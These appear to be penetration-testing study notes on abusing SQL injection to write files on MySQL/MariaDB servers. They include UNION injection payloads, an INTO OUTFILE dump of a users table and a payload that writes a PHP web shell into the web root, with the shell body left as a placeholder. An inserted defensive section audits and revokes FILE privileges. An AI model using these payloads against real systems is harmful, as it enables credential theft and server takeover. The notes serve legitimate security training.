  1. A user with the FILE privilege enabled
  2. The MySQL global secure_file_priv variable not enabled (i.e. empty, so file writes are not confined to one directory)
  3. Write access to the location we want to write to on the back-end server

We already know how to check for the FILE privilege from the Reading Files section.

secure_file_priv

  • secure_file_priv tells us where we can read/write files.
    • if empty, we can read/write on the entire system
    • if a certain directory is set, we can read/write to that directory only
    • NULL means we cannot read/write at all
  • DEFAULT LOCATIONS for secure_file_priv:
    • MariaDB - empty by default
    • MySQL - /var/lib/mysql-files
    • Even worse, some modern configurations default to NULL, meaning that we cannot read/write files anywhere within the system.
  • To check the current value:

      SHOW VARIABLES LIKE 'secure_file_priv';

      SELECT variable_name, variable_value FROM information_schema.global_variables WHERE variable_name="secure_file_priv";
      
  • IN' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"#

    • shows that the value is empty, hence we can read/write to the entire system

WRITE

  • https://mariadb.com/kb/en/select-into-outfile/
  • SELECT * from users INTO OUTFILE '/tmp/credentials';
    • then running cat /tmp/credentials on the server shows the query output
  • SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
    • sends a string to a file
  • The owner of these files will be the user running MySQL, usually named mysql.
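The following is an added audit script, not part of these notes, that looks at the secure_file_priv section and the WRITE section above from the database administrator's side: it checks the two preconditions listed at the top (FILE privilege, unrestricted secure_file_priv), removes FILE from an application account that should not hold it, and verifies the directory restriction. The account name 'webapp'@'localhost' and the test file names are constructed placeholders.

```sql
-- Added audit script, not from the original notes. Run as a MySQL/MariaDB
-- administrator; 'webapp'@'localhost' and the test file names are constructed.

-- 1. Where may the server read/write files?
--    '' (empty) = anywhere the mysql OS user can reach, a path = only below
--    that directory, NULL = file import/export disabled.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Which accounts hold the global FILE privilege that INTO OUTFILE and
--    LOAD_FILE() require? Any grantee that is not a DBA account is a finding.
SELECT grantee
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE';

-- 3. Same question for one specific application account.
SHOW GRANTS FOR 'webapp'@'localhost';

-- 4. An application account has no business writing server-side files:
--    revoke FILE (takes effect immediately; no FLUSH PRIVILEGES needed).
REVOKE FILE ON *.* FROM 'webapp'@'localhost';

-- 5. Re-check; FILE must no longer appear in the grant list.
SHOW GRANTS FOR 'webapp'@'localhost';

-- 6. Directory restriction check, run from an account that still has FILE.
--    With secure_file_priv = '/var/lib/mysql-files' the first write is
--    allowed and the second is refused. If both are allowed, the variable is
--    empty; it is read-only at runtime, so set it in the server config:
--        [mysqld]
--        secure_file_priv = /var/lib/mysql-files
SELECT 'audit write test' INTO OUTFILE '/var/lib/mysql-files/audit_test.txt';
SELECT 'audit write test' INTO OUTFILE '/tmp/audit_test.txt';
```

Two properties matter when reading the WRITE section: INTO OUTFILE never overwrites an existing file, so a second write to the same path fails and the audit file above has to be deleted by hand between runs; and the file is created as the mysql OS user, so the real mitigation for the web-shell case below is that this user has no write permission on the web root. One caveat on the query in the secure_file_priv section: information_schema.global_variables was removed in MySQL 5.7/8.0, where the same query runs against performance_schema.global_variables; MariaDB still ships the information_schema table.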

Web Root information

Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use load_file to read the server configuration, like Apache's configuration found at /etc/apache2/apache2.conf, Nginx's configuration at /etc/nginx/nginx.conf, or IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using this wordlist for Linux or this wordlist for Windows. Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.

Writing a web-shell

  • IN' union select "",'<update from image>', "", "" into outfile '/var/www/html/shell.php'#
  • https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/